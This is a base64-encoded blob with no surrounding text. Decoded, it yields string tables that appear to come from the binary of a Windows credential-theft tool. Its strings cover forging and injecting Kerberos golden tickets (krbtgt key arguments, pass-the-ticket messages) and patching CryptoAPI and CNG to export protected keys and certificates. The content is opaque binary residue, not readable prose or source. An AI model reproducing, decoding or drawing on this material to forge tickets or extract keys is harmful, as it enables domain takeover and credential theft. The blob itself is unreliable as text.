AGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUARQBuAGMAbwBkAGUAZABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFEAdQBlAHIAeQBUAGkAYwBrAGUAdABDAGEAYwBoAGUARQB4ADIATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFEAdQBlAHIAeQBUAGkAYwBrAGUAdABDAGEAYwBoAGUARQB4ADIATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAHQAawB0AAAAbgBvAGMAYQBjAGgAZQAAAHQAYQByAGcAZQB0AAAAAABBAHMAawBpAG4AZwAgAGYAbwByADoAIAAlAHcAWgAKAAAAAAAgACAAIAAqACAAVABpAGMAawBlAHQAIABFAG4AYwByAHkAcAB0AGkAbwBuACAAVAB5AHAAZQAgACYAIABrAHYAbgBvACAAbgBvAHQAIAByAGUAcAByAGUAcwBlAG4AdABhAHQAaQB2AGUAIABhAHQAIABzAGMAcgBlAGUAbgAKAAAAAAAAAAAAIAAgACAAKgAgAE4AbwBDAGEAYwBoAGUAOgAgAGUAeABwAG8AcgB0AGUAZAAgAHQAaQBjAGsAZQB0ACAAbQBhAHkAIAB2AGEAcgB5ACAAdwBpAHQAaAAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgBzACAAYQB0ACAAcwBjAHIAZQBlAG4ACgAAAAoAIAAgACAAKgAgAFQASwBUACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAIAAgADoAIAAlAHMAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGEAcwBrACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAKACAAIAAgACoAIABLAGkAUgBCAGkAIAB0AG8AIABmAGkAbABlACAAIAAgACAAIAA6ACAAJQBzAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUARQBuAGMAbwBkAGUAZABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAALwAgAFAAYQBjAGsAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUARQBuAGMAbwBkAGUAZABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGEAcwBrACAAOwAgACcAJQB3AFoAJwAgAEsAZQByAGIAZQByAG8AcwAgAG4AYQBtAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAhAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGEAcwBrACAAOwAgAEEAdAAgAGwAZQBhAHMAdAAgAC8AdABhAHIAZwBlAHQAIABhAHIAZwB1AG0AZQBuAHQAIABpAHMAIAByAGUAcQB1AGkAcgBlAGQAIAAoAGUAZwA6ACAALwB0AGEAcgBnAGUAdAA6AGMAaQBmAHMALwBzAGUAcgB2AGUAcgAuAGwAYQBiAC4AbABvAGMAYQBsACkACgAAAAAAJQB1AC0AJQAwADgAeAAtACUAdwBaAEAAJQB3AFoALQAlAHcAWgAuACUAcwAAAAAAJQAwADgAeAAtACUAdwBaAEAAJQB3AFoALQAlAHcAWgAuACUAcwAAACUAMAA4AHgALQBuAG8AbgBhAG0AZQAuACUAcwAAAAAAdABpAGMAawBlAHQALgBrAGkAcgBiAGkAAAAAAHQAaQBjAGsAZQB0AAAAAABhAGQAbQBpAG4AAAB1AHMAZQByAAAAAABkAG8AbQBhAGkAbgAAAAAAZABlAHMAAAByAGMANAAAAGsAcgBiAHQAZwB0AAAAAABhAGUAcwAxADIAOAAAAAAAYQBlAHMAMgA1ADYAAAAAAHMAZQByAHYAaQBjAGUAAABpAGQAAAAAAHIAbwBkAGMAAAAAAGcAcgBvAHUAcABzAAAAAABzAGkAZABzAAAAAAAwAAAAcwB0AGEAcgB0AG8AZgBmAHMAZQB0AAAANQAyADUANgAwADAAMAAAAGUAbgBkAGkAbgAAAHIAZQBuAGUAdwBtAGEAeAAAAAAAVQBzAGUAcgAgACAAIAAgACAAIAA6ACAAJQBzAAoARABvAG0AYQBpAG4AIAAgACAAIAA6ACAAJQBzACAAKAAlAHMAKQAKAFMASQBEACAAIAAgACAAIAAgACAAOgAgACUAcwAKAFUAcwBlAHIAIABJAGQAIAAgACAAOgAgACUAdQAKAAAARwByAG8AdQBwAHMAIABJAGQAIAA6ACAAKgAAACUAdQAgAAAACgBFAHgAdAByAGEAIABTAEkARABzADoAIAAAAAoAUwBlAHIAdgBpAGMAZQBLAGUAeQA6ACAAAAAgAC0AIAAlAHMACgAAAAAAUwBlAHIAdgBpAGMAZQAgACAAIAA6ACAAJQBzAAoAAABUAGEAcgBnAGUAdAAgACAAIAAgADoAIAAlAHMACgAAAEwAaQBmAGUAdABpAG0AZQAgACAAOgAgAAAAAAAqACoAIABQAGEAcwBzACAAVABoAGUAIABUAGkAYwBrAGUAdAAgACoAKgAAAC0APgAgAFQAaQBjAGsAZQB0ACAAOgAgACUAcwAKAAoAAAAAAAAAAAAKAEcAbwBsAGQAZQBuACAAdABpAGMAawBlAHQAIABmAG8AcgAgACcAJQBzACAAQAAgACUAcwAnACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkAIABzAHUAYgBtAGkAdAB0AGUAZAAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4ACgAAAAAACgBGAGkAbgBhAGwAIABUAGkAYwBrAGUAdAAgAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAIAAhAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAAoAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAQwByAGUAZAAgAGUAcgByAG8AcgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAdABnAHQAIABrAGUAeQAgAHMAaQB6AGUAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAlAHUAIAAoACUAdQAgAGIAeQB0AGUAcwApACAAZgBvAHIAIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIABsAG8AYwBhAHQAZQAgAEMAcgB5AHAAdABvAFMAeQBzAHQAZQBtACAAZgBvAHIAIABFAFQAWQBQAEUAIAAlAHUAIAAoAGUAcgByAG8AcgAgADAAeAAlADAAOAB4ACkAIAAtACAAQQBFAFMAIABvAG4AbAB5ACAAYQB2AGEAaQBsAGEAYgBsAGUAIABvAG4AIABOAFQANgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAGsAcgBiAHQAZwB0ACAAawBlAHkAIABhAHIAZwB1AG0AZQBuAHQAIAAoAC8AcgBjADQAIABvAHIAIAAvAGEAZQBzADEAMgA4ACAAbwByACAALwBhAGUAcwAyADUANgApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAFMASQBEACAAcwBlAGUAbQBzACAAaQBuAHYAYQBsAGkAZAAgAC0AIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABTAEkARAAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABEAG8AbQBhAGkAbgAgAG4AYQBtAGUAIABkAG8AZQBzACAAbgBvAHQAIABsAG8AbwBrACAAbABpAGsAZQAgAGEAIABGAFEARABOAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAZABvAG0AYQBpAG4AIABhAHIAZwB1AG0AZQBuAHQACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAHUAcwBlAHIAIABhAHIAZwB1AG0AZQBuAHQACgAAACAAKgAgAFAAQQBDACAAZwBlAG4AZQByAGEAdABlAGQACgAAACAAKgAgAFAAQQBDACAAcwBpAGcAbgBlAGQACgAAAAAAIAAqACAARQBuAGMAVABpAGMAawBlAHQAUABhAHIAdAAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAgACoAIABFAG4AYwBUAGkAYwBrAGUAdABQAGEAcgB0ACAAZQBuAGMAcgB5AHAAdABlAGQACgAAACAAKgAgAEsAcgBiAEMAcgBlAGQAIABnAGUAbgBlAHIAYQB0AGUAZAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AXwBkAGEAdABhACAAOwAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZQBuAGMAcgB5AHAAdAAgACUAMAA4AHgACgAAAAkAKgAgACUAcwAgAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBoAGEAcwBoAF8AZABhAHQAYQAgADsAIABIAGEAcwBoAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAlADAAOAB4AAoAAAAAAGMAbwB1AG4AdAAAAFgALQBDAEEAQwBIAEUAQwBPAE4ARgA6AAAAAAAKAFAAcgBpAG4AYwBpAHAAYQBsACAAOgAgAAAACgAKAEQAYQB0AGEAIAAlAHUAAAAKAAkAIAAgACAAKgAgAEkAbgBqAGUAYwB0AGkAbgBnACAAdABpAGMAawBlAHQAIAA6ACAAAAAAAAoACQAgACAAIAAqACAAUwBhAHYAZQBkACAAdABvACAAZgBpAGwAZQAgACUAcwAgACEAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAoACQAqACAAJQB3AFoAIABlAG4AdAByAHkAPwAgACoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABjAGMAYQBjAGgAZQAgAHYAZQByAHMAaQBvAG4AIAAhAD0AIAAwAHgAMAA1ADAANAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABBAHQAIABsAGUAYQBzAHQAIABvAG4AZQAgAGYAaQBsAGUAbgBhAG0AZQAgAGkAcwAgAG4AZQBlAGQAZQBkAAoAAAAAACUAdQAtACUAMAA4AHgALgAlAHMAAAAAAAoACQAgACAAIABTAHQAYQByAHQALwBFAG4AZAAvAE0AYQB4AFIAZQBuAGUAdwA6ACAAAAAKAAkAIAAgACAAUwBlAHIAdgBpAGMAZQAgAE4AYQBtAGUAIAAAAAAACgAJACAAIAAgAFQAYQByAGcAZQB0ACAATgBhAG0AZQAgACAAAAAAAAoACQAgACAAIABDAGwAaQBlAG4AdAAgAE4AYQBtAGUAIAAgAAAAAAAgACgAIAAlAHcAWgAgACkAAAAAAAoACQAgACAAIABGAGwAYQBnAHMAIAAlADAAOAB4ACAAIAAgACAAOgAgAAAACgAJACAAIAAgAFMAZQBzAHMAaQBvAG4AIABLAGUAeQAgACAAIAAgACAAIAAgADoAIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAAAAAAAoACQAgACAAIAAgACAAAAAAAAAACgAJACAAIAAgAFQAaQBjAGsAZQB0ACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAIAA7ACAAawB2AG4AbwAgAD0AIAAlAHUAAAAAAAkAWwAuAC4ALgBdAAAAAABuAGEAbQBlAF8AYwBhAG4AbwBuAGkAYwBhAGwAaQB6AGUAAABvAGsAXwBhAHMAXwBkAGUAbABlAGcAYQB0AGUAAAAAAGgAdwBfAGEAdQB0AGgAZQBuAHQAAAAAAHAAcgBlAF8AYQB1AHQAaABlAG4AdAAAAGkAbgBpAHQAaQBhAGwAAAByAGUAbgBlAHcAYQBiAGwAZQAAAGkAbgB2AGEAbABpAGQAAABwAG8AcwB0AGQAYQB0AGUAZAAAAG0AYQB5AF8AcABvAHMAdABkAGEAdABlAAAAAABwAHIAbwB4AHkAAABwAHIAbwB4AGkAYQBiAGwAZQAAAGYAbwByAHcAYQByAGQAZQBkAAAAZgBvAHIAdwBhAHIAZABhAGIAbABlAAAAKAAlADAAMgBoAHUAKQAgADoAIAAAAAAAJQB3AFoAIAA7ACAAAAAAACgALQAtACkAIAA6ACAAAABAACAAJQB3AFoAAABuAHUAbABsACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAABkAGUAcwBfAHAAbABhAGkAbgAgACAAIAAgACAAIAAgACAAAABkAGUAcwBfAGMAYgBjAF8AYwByAGMAIAAgACAAIAAgACAAAABkAGUAcwBfAGMAYgBjAF8AbQBkADQAIAAgACAAIAAgACAAAABkAGUAcwBfAGMAYgBjAF8AbQBkADUAIAAgACAAIAAgACAAAABkAGUAcwBfAGMAYgBjAF8AbQBkADUAXwBuAHQAIAAgACAAAAByAGMANABfAHAAbABhAGkAbgAgACAAIAAgACAAIAAgACAAAAByAGMANABfAHAAbABhAGkAbgAyACAAIAAgACAAIAAgACAAAAByAGMANABfAHAAbABhAGkAbgBfAGUAeABwACAAIAAgACAAAAByAGMANABfAGwAbQAgACAAIAAgACAAIAAgACAAIAAgACAAAAByAGMANABfAG0AZAA0ACAAIAAgACAAIAAgACAAIAAgACAAAAByAGMANABfAHMAaABhACAAIAAgACAAIAAgACAAIAAgACAAAAByAGMANABfAGgAbQBhAGMAXwBuAHQAIAAgACAAIAAgACAAAAByAGMANABfAGgAbQBhAGMAXwBuAHQAXwBlAHgAcAAgACAAAAByAGMANABfAHAAbABhAGkAbgBfAG8AbABkACAAIAAgACAAAAByAGMANABfAHAAbABhAGkAbgBfAG8AbABkAF8AZQB4AHAAAAByAGMANABfAGgAbQBhAGMAXwBvAGwAZAAgACAAIAAgACAAAAByAGMANABfAGgAbQBhAGMAXwBvAGwAZABfAGUAeABwACAAAABhAGUAcwAxADIAOABfAGgAbQBhAGMAXwBwAGwAYQBpAG4AAABhAGUAcwAyADUANgBfAGgAbQBhAGMAXwBwAGwAYQBpAG4AAABhAGUAcwAxADIAOABfAGgAbQBhAGMAIAAgACAAIAAgACAAAABhAGUAcwAyADUANgBfAGgAbQBhAGMAIAAgACAAIAAgACAAAAB1AG4AawBuAG8AdwAgACAAIAAgACAAIAAgACAAIAAgACAAAABzAHQAYQB0AHUAcwAAAAAAcwBpAG4AZwBsAGUAAAAAAG8AZgBmAAAAdABlAHMAdAAAAAAAYgB1AHMAeQBsAGkAZwBoAHQAAABCAHUAcwB5AEwAaQBnAGgAdAAgAE0AbwBkAHUAbABlAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAG8AZgBmACAAOwAgAE4AbwAgAEIAdQBzAHkATABpAGcAaAB0AAoAAAAAAEkATgBQAFUAVABFAFYARQBOAFQAAAAAAEwASQBHAEgAVAAAAFMATwBVAE4ARAAAAEoASQBOAEcATABFAF8AQwBMAEkAUABTAAAAAABCAHUAcwB5AEwAaQBnAGgAdAAgAGQAZQB0AGUAYwB0AGUAZAAKAAAAAAAAAAoAWwAlADMAdQBdACAAJQBzAAoAIAAgAFYAZQBuAGQAbwByADoAIAAwAHgAJQAwADQAeAAsACAAUAByAG8AZAB1AGMAdAA6ACAAMAB4ACUAMAA0AHgALAAgAFYAZQByAHMAaQBvAG4AOgAgADAAeAAlADAANAB4AAoAIAAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACAAIAA6ACAAJQBzAAoAIAAgAEMAYQBwAGEAYgBpAGwAaQB0AGkAZQBzACAAIAA6ACAAMAB4ACUAMAAyAHgAIAAoACAAAAAlAHMALAAgAAAAAAAgACAARABlAHYAaQBjAGUAIABIAGEAbgBkAGwAZQA6ACAAMAB4ACUAcAAKAAAAAAAgACAAIAAgAFMAdABhAHQAdQBzACAAIAAgACAAIAA6ACAAMAB4ACUAMAAyAHgACgAAAAAAIAAgACAAIABQAHIAbwBkAHUAYwB0AEkAZAAgACAAOgAgACUAUwAKAAAAAAAgACAAIAAgAEMAbwBzAHQAdQBtAGUAcgBJAGQAIAA6ACAAJQBTAAoAAAAAACAAIAAgACAATQBvAGQAZQBsACAAIAAgACAAIAAgADoAIAAlAFMACgAAAAAAIAAgACAAIABTAGUAcgBpAGEAbAAgACAAIAAgACAAOgAgACUAUwAKAAAAAAAgACAAIAAgAE0AZgBnAF8ASQBEACAAIAAgACAAIAA6ACAAJQBTAAoAAAAAACAAIAAgACAATQBmAGcAXwBEAGEAdABlACAAIAAgADoAIAAlAFMACgAAAAAAIAAgACAAIABzAHcAcgBlAGwAZQBhAHMAZQAgACAAOgAgACUAUwAKAAAAAAAgACAASwBlAGUAcABBAGwAaQB2AGUAIABUAGgAcgBlAGEAZAA6ACAAMAB4ACUAcAAgACgAJQB1ACAAbQBzACkACgAgACAAVwBvAHIAawBlAHIAIABUAGgAcgBlAGEAZAAgACAAIAA6ACAAMAB4ACUAcAAgACgAJQB1ACAAbQBzACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAHMAdABhAHQAdQBzACAAOwAgAE4AbwAgAEIAdQBzAHkATABpAGcAaAB0AAoAAABbACUAMwB1AF0AIAAlAHMAIAAoACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAGwAaQBzAHQAIAA7ACAATgBvACAAQgB1AHMAeQBMAGkAZwBoAHQACgAAAHMAbwB1AG4AZAAAAGMAbwBsAG8AcgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYgB1AHMAeQBsAGkAZwBoAHQAXwBzAGkAbgBnAGwAZQAgADsAIABOAG8AIABCAHUAcwB5AEwAaQBnAGgAdAAKAAAAcAByAG8AdgBpAGQAZQByAHMAAABMAGkAcwB0ACAAYwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAHAAcgBvAHYAaQBkAGUAcgBzAAAAAABzAHQAbwByAGUAcwAAAAAATABpAHMAdAAgAGMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABzAHQAbwByAGUAcwAAAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzAAAAAABMAGkAcwB0ACAAKABvAHIAIABlAHgAcABvAHIAdAApACAAYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAAABrAGUAeQBzAAAAAAAAAAAATABpAHMAdAAgACgAbwByACAAZQB4AHAAbwByAHQAKQAgAGsAZQB5AHMAIABjAG8AbgB0AGEAaQBuAGUAcgBzAAAAAAAAAAAASABhAHMAaAAgAGEAIABwAGEAcwBzAHcAbwByAGQAIAB3AGkAdABoACAAbwBwAHQAaQBvAG4AYQBsACAAdQBzAGUAcgBuAGEAbQBlAAAAAABEAGUAcwBjAHIAaQBiAGUAIABhACAAVwBpAG4AZABvAHcAcwAgAFMAeQBzAHQAZQBtACAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAKABmAGkAbABlACwAIABUAE8ARABPADoAcgBlAGcAaQBzAHQAcgB5ACAAbwByACAAaABpAHYAZQApAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAUABhAHQAYwBoACAAQwByAHkAcAB0AG8AQQBQAEkAIABsAGEAeQBlAHIAIABmAG8AcgAgAGUAYQBzAHkAIABlAHgAcABvAHIAdAAAAAAAAAAAAFsAZQB4AHAAZQByAGkAbQBlAG4AdABhAGwAXQAgAFAAYQB0AGMAaAAgAEMATgBHACAAcwBlAHIAdgBpAGMAZQAgAGYAbwByACAAZQBhAHMAeQAgAGUAeABwAG8AcgB0AAAAAABjAHIAeQBwAHQAbwAAAAAAQwByAHkAcAB0AG8AIABNAG8AZAB1AGwAZQAAAHIAcwBhAGUAbgBoAAAAAABDUEV4cG9ydEtleQBuAGMAcgB5AHAAdAAAAAAATkNyeXB0T3BlblN0b3JhZ2VQcm92aWRlcgAAAE5DcnlwdEVudW1LZXlzAABOQ3J5cHRPcGVuS2V5AAAATkNyeXB0SW1wb3J0S2V5AE5DcnlwdEV4cG9ydEtleQBOQ3J5cHRHZXRQcm9wZXJ0eQAAAE5DcnlwdFNldFByb3BlcnR5AAAATkNyeXB0RnJlZUJ1ZmZlcgAAAABOQ3J5cHRGcmVlT2JqZWN0AAAAAEJDcnlwdEVudW1SZWdpc3RlcmVkUHJvdmlkZXJzAAAAQkNyeXB0RnJlZUJ1ZmZlcgAAAAAKAEMAcgB5AHAAdABvAEEAUABJACAAcAByAG8AdgBpAGQAZQByAHMAIAA6AAoAAAAlADIAdQAuACAAJQAtADEAMwBzACAAKAAlADIAdQApACAALQAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABDAHIAeQBwAHQARQBuAHUAbQBQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAEMAcgB5AHAAdABvAEEAUABJACAAcAByAG8AdgBpAGQAZQByACAAdAB5AHAAZQBzADoACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcAByAG8AdgBpAGQAZQByAHMAIAA7ACAAQwByAHkAcAB0AEUAbgB1AG0AUAByAG8AdgBpAGQAZQByAFQAeQBwAGUAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAEMATgBHACAAcAByAG8AdgBpAGQAZQByAHMAIAA6AAoAAAAlADIAdQAuACAAJQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcAByAG8AdgBpAGQAZQByAHMAIAA7ACAAQgBDAHIAeQBwAHQARQBuAHUAbQBSAGUAZwBpAHMAdABlAHIAZQBkAFAAcgBvAHYAaQBkAGUAcgBzACAAKAAwAHgAJQAwADgAeAApAAoAAABDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgAAAAAAcwB5AHMAdABlAG0AcwB0AG8AcgBlAAAAQQBzAGsAaQBuAGcAIABmAG8AcgAgAFMAeQBzAHQAZQBtACAAUwB0AG8AcgBlACAAJwAlAHMAJwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHMAdABvAHIAZQBzACAAOwAgAEMAZQByAHQARQBuAHUAbQBTAHkAcwB0AGUAbQBTAHQAbwByAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAcwBpAGwAZQBuAHQAAAAAAG4AbwBrAGUAeQAAAE0AeQAAAAAAcwB0AG8AcgBlAAAAAAAAACAAKgAgAFMAeQBzAHQAZQBtACAAUwB0AG8AcgBlACAAIAA6ACAAJwAlAHMAJwAgACgAMAB4ACUAMAA4AHgAKQAKACAAKgAgAFMAdABvAHIAZQAgACAAIAAgACAAIAAgACAAIAA6ACAAJwAlAHMAJwAKAAoAAAAAACgAbgB1AGwAbAApAAAAAAAJAEsAZQB5ACAAQwBvAG4AdABhAGkAbgBlAHIAIAAgADoAIAAlAHMACgAJAFAAcgBvAHYAaQBkAGUAcgAgACAAIAAgACAAIAAgADoAIAAlAHMACgAJAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAAgADoAIAAlAHMAIAAoACUAdQApAAoAAAAAAAkAVAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAHIAeQBwAHQARwBlAHQAVQBzAGUAcgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAGsAZQB5AFMAcABlAGMAIAA9AD0AIABDAEUAUgBUAF8ATgBDAFIAWQBQAFQAXwBLAEUAWQBfAFMAUABFAEMAIAB3AGkAdABoAG8AdQB0ACAAQwBOAEcAIABIAGEAbgBkAGwAZQAgAD8ACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAHIAeQBwAHQAQQBjAHEAdQBpAHIAZQBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAUAByAGkAdgBhAHQAZQBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AEMAZQByAHQAaQBmAGkAYwBhAHQAZQBDAG8AbgB0AGUAeAB0AFAAcgBvAHAAZQByAHQAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AE4AYQBtAGUAUwB0AHIAaQBuAGcAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0